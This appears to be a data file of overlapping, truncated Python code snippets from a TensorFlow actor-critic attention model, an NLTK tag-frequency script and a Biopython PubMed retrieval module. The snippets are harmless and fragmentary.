Transpose the result such that the shape is (batch_size, num_heads, seq_len,", "depth) v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth) # scaled_attention.shape ==", "self.last = last def call(self, x, training, mask=None): cl_output = self.activation_layer(self.cnn_layer(x)) attn_output, _", "1]), [x.shape[0], x.shape[1], z.shape[1]]) x = tf.concat([x, z], -1) for attention_block in self.attention_blocks:", "kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size,", "vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(1, name='critic_output') def", "actor_activation=False): super(ActorCritic, self).__init__() self.actor = Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks,", "scaled tensor. if mask is not None: scaled_attention_logits += (mask * -1e9) #", "# (batch_size, num_heads, seq_len_k, depth) v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v,", "tf.shape(q)[0] q = self.wq(q) # (batch_size, seq_len, d_model) k = self.wk(k) # (batch_size,", "value = self.critic(x, z) # Actor actor_output = self.actor(x, z) std = tf.zeros_like(actor_output)", "Dense(d_model) self.dense = Dense(d_model) def split_heads(self, x, batch_size): \"\"\"Split the last dimension into", "__init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs)", "self.dense = Dense(d_model) def split_heads(self, x, batch_size): \"\"\"Split the last dimension into (num_heads,", "Use 'same' padding so outputs have the same shape as inputs. 
padding='same') self.activation_layer", "(batch_size, num_heads, seq_len_k, depth) v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth)", "text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation =", "= LayerNormalization(epsilon=1e-6) self.residual = residual self.last = last def call(self, x, training, mask=None):", "Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual = residual self.last = last", "num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer =", "= Dense(1, name='critic_output') def call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x)", "x class SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8,", "**kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks", "lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, in_lstm_units = 32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs):", "scaled_dot_product_attention(q, k, v, mask): matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k)", "residual=i!=0, last=i==num_blocks-1) for i in range(num_blocks)] self.lstm_layer = LSTM(lstm_units) def call(self, x, z,", "self.dense1 = Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual", "self.dense2 = Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) 
self.residual = residual self.last", "Sequential from tensorflow.keras.layers import Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding,", "q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth) k = self.split_heads(k, batch_size)", "batch_size) # (batch_size, num_heads, seq_len_k, depth) v = self.split_heads(v, batch_size) # (batch_size, num_heads,", "= 32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters,", "# (batch_size, seq_len, d_model) q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth)", "# (batch_size, num_heads, seq_len_q, depth) k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k,", "z): x = self.shared_block(x, z) return self.dense_layer(x) class Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128,", "# (batch_size, seq_len_q, d_model) output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model) return output," ]
[ "= result[\"Tag\"] print(Tags) allTag = \"\" for row in result.index: allTag = allTag", "as np import nltk nltk.download('punkt') import os import nltk.corpus from nltk.probability import FreqDist", "allTag = \"\" for row in result.index: allTag = allTag + \" \"", "word_tokenize # read result result = pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags) allTag =", "print(Tags) allTag = \"\" for row in result.index: allTag = allTag + \"", "\"\" for row in result.index: allTag = allTag + \" \" + result['Tag'][row]", "as pd import numpy as np import nltk nltk.download('punkt') import os import nltk.corpus", "\" + result['Tag'][row] token = word_tokenize(allTag) # find most popular 20tag fdist =", "from nltk.probability import FreqDist from nltk.tokenize import word_tokenize # read result result =", "result.index: allTag = allTag + \" \" + result['Tag'][row] token = word_tokenize(allTag) #", "row in result.index: allTag = allTag + \" \" + result['Tag'][row] token =", "import os import nltk.corpus from nltk.probability import FreqDist from nltk.tokenize import word_tokenize #", "import word_tokenize # read result result = pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags) allTag", "numpy as np import nltk nltk.download('punkt') import os import nltk.corpus from nltk.probability import", "allTag + \" \" + result['Tag'][row] token = word_tokenize(allTag) # find most popular", "read result result = pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags) allTag = \"\" for", "nltk.probability import FreqDist from nltk.tokenize import word_tokenize # read result result = pd.read_csv(\"result.csv\")", "nltk.download('punkt') import os import nltk.corpus from nltk.probability import FreqDist from nltk.tokenize import word_tokenize", "from nltk.tokenize import word_tokenize # read result result = pd.read_csv(\"result.csv\") Tags = result[\"Tag\"]", "+ result['Tag'][row] token = word_tokenize(allTag) # find most popular 20tag fdist = 
FreqDist(token)", "= word_tokenize(allTag) # find most popular 20tag fdist = FreqDist(token) fdist20 = fdist.most_common(20)", "+ \" \" + result['Tag'][row] token = word_tokenize(allTag) # find most popular 20tag", "allTag = allTag + \" \" + result['Tag'][row] token = word_tokenize(allTag) # find", "# read result result = pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags) allTag = \"\"", "result result = pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags) allTag = \"\" for row", "import nltk.corpus from nltk.probability import FreqDist from nltk.tokenize import word_tokenize # read result", "nltk.corpus from nltk.probability import FreqDist from nltk.tokenize import word_tokenize # read result result", "\" \" + result['Tag'][row] token = word_tokenize(allTag) # find most popular 20tag fdist", "np import nltk nltk.download('punkt') import os import nltk.corpus from nltk.probability import FreqDist from", "Tags = result[\"Tag\"] print(Tags) allTag = \"\" for row in result.index: allTag =", "import nltk nltk.download('punkt') import os import nltk.corpus from nltk.probability import FreqDist from nltk.tokenize", "result[\"Tag\"] print(Tags) allTag = \"\" for row in result.index: allTag = allTag +", "= allTag + \" \" + result['Tag'][row] token = word_tokenize(allTag) # find most", "result['Tag'][row] token = word_tokenize(allTag) # find most popular 20tag fdist = FreqDist(token) fdist20", "FreqDist from nltk.tokenize import word_tokenize # read result result = pd.read_csv(\"result.csv\") Tags =", "import numpy as np import nltk nltk.download('punkt') import os import nltk.corpus from nltk.probability", "nltk.tokenize import word_tokenize # read result result = pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags)", "import FreqDist from nltk.tokenize import word_tokenize # read result result = pd.read_csv(\"result.csv\") Tags", "nltk nltk.download('punkt') import os import nltk.corpus from nltk.probability import FreqDist from 
nltk.tokenize import", "= \"\" for row in result.index: allTag = allTag + \" \" +", "token = word_tokenize(allTag) # find most popular 20tag fdist = FreqDist(token) fdist20 =", "pandas as pd import numpy as np import nltk nltk.download('punkt') import os import", "os import nltk.corpus from nltk.probability import FreqDist from nltk.tokenize import word_tokenize # read", "import pandas as pd import numpy as np import nltk nltk.download('punkt') import os", "pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags) allTag = \"\" for row in result.index: allTag", "in result.index: allTag = allTag + \" \" + result['Tag'][row] token = word_tokenize(allTag)", "word_tokenize(allTag) # find most popular 20tag fdist = FreqDist(token) fdist20 = fdist.most_common(20) print(fdist20)", "for row in result.index: allTag = allTag + \" \" + result['Tag'][row] token", "result = pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags) allTag = \"\" for row in", "= pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags) allTag = \"\" for row in result.index:", "pd import numpy as np import nltk nltk.download('punkt') import os import nltk.corpus from" ]
[ "== '__main__': # path = 'D:/Desktop/artigos/rdml.pdf' # #id = 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>'))", "Bio import Entrez import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from data_structures.document import", "= '<KEY>' try: title = get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid", "!= '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems))", "title = get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid except: return None", "# #id = 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) # term = \"Predicting commercially available", "doc.raw_title = data['Title'] docs.append(doc) else: pmids_not_found.append(pmid) return docs, pmids_not_found #using PMID def get_data_from_pmid(pmid,", "'Abstract': ''} except: article = xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0]", "!= '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems))", "data = get_data_from_pmid(pmid, email) if data is None: pmids_not_found.append(pmid) else: if data['Title'] !=", "email): titles = [] for pdf_path in pdf_paths: with open(pdf_path, 'rb') as f:", "article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract} except: return {'Title':", "= email Entrez.api_key = '<KEY>' handle = 
efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data = read(handle)", "email, retmax) if pmids is None: return None else: docs, pmids_not_found = pmids_to_docs(pmids,", "Entrez.api_key = '<KEY>' try: title = get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return", "= 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences: doc =", "pmids = get_data_from_term(term, email, retmax) if pmids is None: return None else: docs,", "pmids = [] docs_not_found = [] try: for file in files: pmid =", "is None: pmids_not_found.append(pmid) else: if data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid,", "if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs,", "else: docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs def get_data_from_term(term, email, retmax):", "data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization,", "split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words,", "= Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record = Entrez.read(handle) handle.close() return record['IdList'] #Using", "handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] 
title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return", "email, dl_config) return docs def get_data_from_term(term, email, retmax): Entrez.email = email Entrez.api_key =", "remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences: doc = Document(sentences=sentences) doc.raw_title = data['Title'] docs.append(doc)", "return {'Title': title, 'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} except: article", "print(get_data_from_pdf_path(path, '<EMAIL>')) # term = \"Predicting commercially available antiviral drugs that may act", "= \"Predicting commercially available antiviral drugs that may act on the novel coronavirus", "import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from data_structures.document import Document from data_structures.sentence import Sentence", "''} #Using Term def term_to_docs(term, email, retmax, dl_config): pmids = get_data_from_term(term, email, retmax)", "get_data_from_pdf(file, email): Entrez.email = email Entrez.api_key = '<KEY>' try: title = get_title_from_io(file) pmid", "return docs def get_data_from_term(term, email, retmax): Entrez.email = email Entrez.api_key = '<KEY>' handle", "Document from data_structures.sentence import Sentence from data_structures.token import Token from wrappers.dictionary_wrapper import get_sentences_dictionary,", "pmids_to_docs(pmids, email, dl_config): docs = [] pmids_not_found = [] for pmid in pmids:", "#Using Term def term_to_docs(term, email, retmax, dl_config): pmids = get_data_from_term(term, email, retmax) if", "sort='relevance') record = Entrez.read(handle) handle.close() return record['IdList'] #Using pdfs def pdf_paths_to_titles(pdf_paths, email): titles", "= get_data_from_term(term, email, retmax) if pmids is None: return None else: docs, pmids_not_found", "except: return None if __name__ == 
'__main__': # path = 'D:/Desktop/artigos/rdml.pdf' # #id", "doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type", "passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] !=", "# path = 'D:/Desktop/artigos/rdml.pdf' # #id = 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) # term", "{'Title': title, 'Abstract': ''} #Using Term def term_to_docs(term, email, retmax, dl_config): pmids =", "{'Title': title, 'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} #Using Term def", "read from Bio import Entrez import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from", "file in files: pmid = get_data_from_pdf(file, email) if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs,", "if data is None: pmids_not_found.append(pmid) else: if data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type =", "return record['IdList'] #Using pdfs def pdf_paths_to_titles(pdf_paths, email): titles = [] for pdf_path in", "[] for pmid in pmids: sentences = [] data = get_data_from_pmid(pmid, email) if", "email, retmax, dl_config): pmids = get_data_from_term(term, email, retmax) if pmids is None: return", "sentences: doc = Document(sentences=sentences) doc.raw_title = data['Title'] docs.append(doc) else: pmids_not_found.append(pmid) return docs, pmids_not_found", "docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs, docs_not_found except: return None, None", "(SARS-CoV-2) through a 
drug-target interaction deep learning model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths", "[] data = get_data_from_pmid(pmid, email) if data is None: pmids_not_found.append(pmid) else: if data['Title']", "return pmid except: return None if __name__ == '__main__': # path = 'D:/Desktop/artigos/rdml.pdf'", "sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences:", "article = xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title,", "= [] for pmid in pmids: sentences = [] data = get_data_from_pmid(pmid, email)", "pmids_to_docs(pmids, email, dl_config) return docs, docs_not_found except: return None, None def get_data_from_pdf(file, email):", "= get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid except: return None if __name__ == '__main__':", "return docs, pmids_not_found #using PMID def get_data_from_pmid(pmid, email): Entrez.email = email Entrez.api_key =", "return {'Title': title, 'Abstract': ''} except: article = xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try:", "Bio.Entrez import efetch, read from Bio import Entrez import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__)))", "return None else: docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs def get_data_from_term(term,", "get_tokens_dictionary import string from pdftitle import get_title_from_io def pmids_to_docs(pmids, email, dl_config): docs =", "= Entrez.read(handle) handle.close() return record['IdList'] #Using pdfs def pdf_paths_to_titles(pdf_paths, email): titles = []", "None, None def get_data_from_pdf(file, email): 
Entrez.email = email Entrez.api_key = '<KEY>' try: title", "abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract} except: return {'Title': title, 'Abstract':", "return {'Title': title, 'Abstract': ''} #Using Term def term_to_docs(term, email, retmax, dl_config): pmids", "read(handle) handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0]", "'': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if", "nltk from data_structures.document import Document from data_structures.sentence import Sentence from data_structures.token import Token", "sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from data_structures.document import Document from data_structures.sentence import Sentence from data_structures.token", "Entrez.api_key = '<KEY>' handle = efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data = read(handle) handle.close() try:", "pmids_not_found = [] for pmid in pmids: sentences = [] data = get_data_from_pmid(pmid,", "= [] data = get_data_from_pmid(pmid, email) if data is None: pmids_not_found.append(pmid) else: if", "in pmids: sentences = [] data = get_data_from_pmid(pmid, email) if data is None:", "titles = [] for pdf_path in pdf_paths: with open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f,", "pmids_not_found.append(pmid) else: if data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower,", "novel coronavirus (SARS-CoV-2) through a drug-target interaction deep learning model\" # print(get_data_from_term(term, 
'<EMAIL>',", "email, dl_config) return docs, docs_not_found except: return None, None def get_data_from_pdf(file, email): Entrez.email", "= get_data_from_pmid(pmid, email) if data is None: pmids_not_found.append(pmid) else: if data['Title'] != '':", "# print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths = ['D:/Desktop/artigos/Burns.pdf', 'D:/Desktop/artigos/Fergadis.pdf', 'D:/Desktop/artigos/Luo.pdf', 'D:/Desktop/artigos/Mohan.pdf', 'D:/Desktop/artigos/rdml.pdf', 'D:/Desktop/artigos/Yan.pdf'] pdf_paths_to_titles(paths,", "def term_to_docs(term, email, retmax, dl_config): pmids = get_data_from_term(term, email, retmax) if pmids is", "try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract} except: return {'Title': title,", "= read(handle) handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle'] try: abstract =", "abstract} except: return {'Title': title, 'Abstract': ''} except: article = xml_data['PubmedBookArticle'][0]['BookDocument'] title =", "import Token from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary import string from pdftitle import get_title_from_io", "retmax) if pmids is None: return None else: docs, pmids_not_found = pmids_to_docs(pmids, email,", "for pdf_path in pdf_paths: with open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f, email)) return titles", "article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title,", "lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences: doc = Document(sentences=sentences) doc.raw_title = data['Title']", "Sentence from data_structures.token import Token from wrappers.dictionary_wrapper import 
get_sentences_dictionary, get_tokens_dictionary import string from", "Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record = Entrez.read(handle) handle.close() return record['IdList'] #Using pdfs", "def get_data_from_pmid(pmid, email): Entrez.email = email Entrez.api_key = '<KEY>' handle = efetch(db='pubmed', id=int(pmid),", "xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract}", "if pmids is None: return None else: docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config)", "= 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) # term = \"Predicting commercially available antiviral drugs", "get_data_from_pdf(file, email) if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config)", "title, 'Abstract': ''} except: article = xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try: abstract =", "if __name__ == '__main__': # path = 'D:/Desktop/artigos/rdml.pdf' # #id = 20367574 #", "Token from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary import string from pdftitle import get_title_from_io def", "except: return {'Title': title, 'Abstract': ''} #Using Term def term_to_docs(term, email, retmax, dl_config):", "None if __name__ == '__main__': # path = 'D:/Desktop/artigos/rdml.pdf' # #id = 20367574", "email='<EMAIL>', retmax=1)[0] return pmid except: return None if __name__ == '__main__': # path", "import string from pdftitle import get_title_from_io def pmids_to_docs(pmids, email, dl_config): docs = []", "lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower,", 
"[] for pdf_path in pdf_paths: with open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f, email)) return", "pdfs def pdf_paths_to_titles(pdf_paths, email): titles = [] for pdf_path in pdf_paths: with open(pdf_path,", "pdf_path in pdf_paths: with open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f, email)) return titles def", "from data_structures.token import Token from wrappers.dictionary_wrapper import get_sentences_dictionary, get_tokens_dictionary import string from pdftitle", "'<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record = Entrez.read(handle) handle.close() return", "abstract} except: return {'Title': title, 'Abstract': ''} #Using Term def term_to_docs(term, email, retmax,", "retmax, dl_config): pmids = get_data_from_term(term, email, retmax) if pmids is None: return None", "#id = 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) # term = \"Predicting commercially available antiviral", "drugs that may act on the novel coronavirus (SARS-CoV-2) through a drug-target interaction", "except: return None, None def get_data_from_pdf(file, email): Entrez.email = email Entrez.api_key = '<KEY>'", "'D:/Desktop/artigos/rdml.pdf' # #id = 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) # term = \"Predicting commercially", "term=term, idtype=\"acc\", sort='relevance') record = Entrez.read(handle) handle.close() return record['IdList'] #Using pdfs def pdf_paths_to_titles(pdf_paths,", "pdfs_to_docs(files, email, dl_config): pmids = [] docs_not_found = [] try: for file in", "drug-target interaction deep learning model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths = ['D:/Desktop/artigos/Burns.pdf', 'D:/Desktop/artigos/Fergadis.pdf',", "Document(sentences=sentences) doc.raw_title = data['Title'] docs.append(doc) else: pmids_not_found.append(pmid) return docs, pmids_not_found #using PMID def", "return None if __name__ == '__main__': # path = 
'D:/Desktop/artigos/rdml.pdf' # #id =", "pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid except: return None if __name__ ==", "'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} except: article = xml_data['PubmedBookArticle'][0]['BookDocument'] title", "= data['Title'] docs.append(doc) else: pmids_not_found.append(pmid) return docs, pmids_not_found #using PMID def get_data_from_pmid(pmid, email):", "import get_sentences_dictionary, get_tokens_dictionary import string from pdftitle import get_title_from_io def pmids_to_docs(pmids, email, dl_config):", "retmax): Entrez.email = email Entrez.api_key = '<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\",", "data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization,", "from Bio import Entrez import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from data_structures.document", "sentences = [] data = get_data_from_pmid(pmid, email) if data is None: pmids_not_found.append(pmid) else:", "None: return None else: docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs def", "Entrez.email = email Entrez.api_key = '<KEY>' handle = efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data =", "Entrez import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from data_structures.document import Document from", "docs def get_data_from_term(term, email, retmax): Entrez.email = email Entrez.api_key = '<KEY>' handle =", "'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, 
stems=dl_config.stems)) if sentences: doc = Document(sentences=sentences)", "Entrez.email = email Entrez.api_key = '<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance')", "# print(get_data_from_pdf_path(path, '<EMAIL>')) # term = \"Predicting commercially available antiviral drugs that may", "None def get_data_from_pdf(file, email): Entrez.email = email Entrez.api_key = '<KEY>' try: title =", "pmid in pmids: sentences = [] data = get_data_from_pmid(pmid, email) if data is", "= pmids_to_docs(pmids, email, dl_config) return docs def get_data_from_term(term, email, retmax): Entrez.email = email", "20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) # term = \"Predicting commercially available antiviral drugs that", "= [] for pdf_path in pdf_paths: with open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f, email))", "email Entrez.api_key = '<KEY>' handle = efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data = read(handle) handle.close()", "= efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data = read(handle) handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title", "a drug-target interaction deep learning model\" # print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths = ['D:/Desktop/artigos/Burns.pdf',", "print(get_data_from_term(term, '<EMAIL>', 1)['IdList']) paths = ['D:/Desktop/artigos/Burns.pdf', 'D:/Desktop/artigos/Fergadis.pdf', 'D:/Desktop/artigos/Luo.pdf', 'D:/Desktop/artigos/Mohan.pdf', 'D:/Desktop/artigos/rdml.pdf', 'D:/Desktop/artigos/Yan.pdf'] pdf_paths_to_titles(paths, '<EMAIL>.com')", "data_structures.document import Document from data_structures.sentence import Sentence from data_structures.token import Token from wrappers.dictionary_wrapper", "= [] docs_not_found = [] try: for file in files: pmid = get_data_from_pdf(file,", "\"Predicting commercially available antiviral drugs that may act on the novel coronavirus (SARS-CoV-2)", 
"in pdf_paths: with open(pdf_path, 'rb') as f: titles.append(get_data_from_pdf(f, email)) return titles def pdfs_to_docs(files,", "pdf_paths_to_titles(pdf_paths, email): titles = [] for pdf_path in pdf_paths: with open(pdf_path, 'rb') as", "title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract} except:", "act on the novel coronavirus (SARS-CoV-2) through a drug-target interaction deep learning model\"", "article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} except:", "def pdfs_to_docs(files, email, dl_config): pmids = [] docs_not_found = [] try: for file", "email, retmax): Entrez.email = email Entrez.api_key = '<KEY>' handle = Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term,", "that may act on the novel coronavirus (SARS-CoV-2) through a drug-target interaction deep", "None else: docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs def get_data_from_term(term, email,", "else: if data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation,", "docs_not_found = [] try: for file in 